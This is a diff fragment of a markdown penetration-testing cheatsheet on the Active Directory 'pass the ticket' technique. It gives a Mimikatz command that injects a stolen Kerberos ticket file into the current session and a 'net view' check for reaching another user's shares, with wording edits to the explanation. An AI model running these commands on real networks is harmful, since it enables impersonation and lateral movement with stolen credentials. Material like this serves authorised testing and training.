notCyloth/Cheatsheet/2.5 - Active Directory/2 - Post-Compromise/3 - Lateral Movement/Pass the Ticket.md

 ```batch
 kerberos::ptt $(KIRBI_FILENAME)
 ```
-Now there will be the permissions of the ticket enabled on the current session and user. (i.e. if the user who's ticket was taken from cache is able to access a share, you can too!)
 ### Example:
-Now that the share is accessible in the session, try the following:
+If the user who's ticket was taken from cache is able to access a share, you can too!
+Try the following:
 ```batch
 net view \\web04
 ```